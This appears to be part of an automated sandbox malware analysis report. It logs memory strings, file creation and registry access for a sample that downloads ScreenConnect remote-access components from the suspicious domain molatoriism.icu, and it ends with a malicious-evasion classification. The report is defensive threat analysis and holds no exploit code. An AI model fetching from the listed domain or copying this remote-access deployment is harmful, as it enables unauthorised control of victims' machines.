                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf0
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfD
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 0000000D.00000003.2677267062.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DncBP1eH7ECmgRuZSg991nNUauNrRrG3A4nY0k14
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887830173.000001D225232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 0000000D.00000003.2502118247.000001D224B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 0000000D.00000003.2501912233.000001D224B5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 0000000D.00000002.3887123169.000001D2242B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf)%
                  Source: svchost.exe, 0000000D.00000002.3887830173.000001D225232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfc
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 0000000D.00000002.3888225184.000001D22527F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 0000000D.00000002.3888225184.000001D22527F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfityCRL
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfSt
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
                  Source: svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfh
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientSe
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientService.dllA0
                  Source: dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3915104287.0000023570CFC000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Wind
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350040E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.3909247631.000002356D1C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Windows.dlld
                  Source: dfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Windows.dllkg
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config(
                  Source: dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configF
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350040E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsC
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350046F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.configU
                  Source: dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exen
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exet
                  Source: qmgr.db.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknown HTTPS traffic detected: 172.67.182.214:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  Source: pzPO97QouM.exe PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\user.config
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856
                  Source: pzPO97QouM.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engine Classification label: mal60.evad.winEXE@20/78@2/3
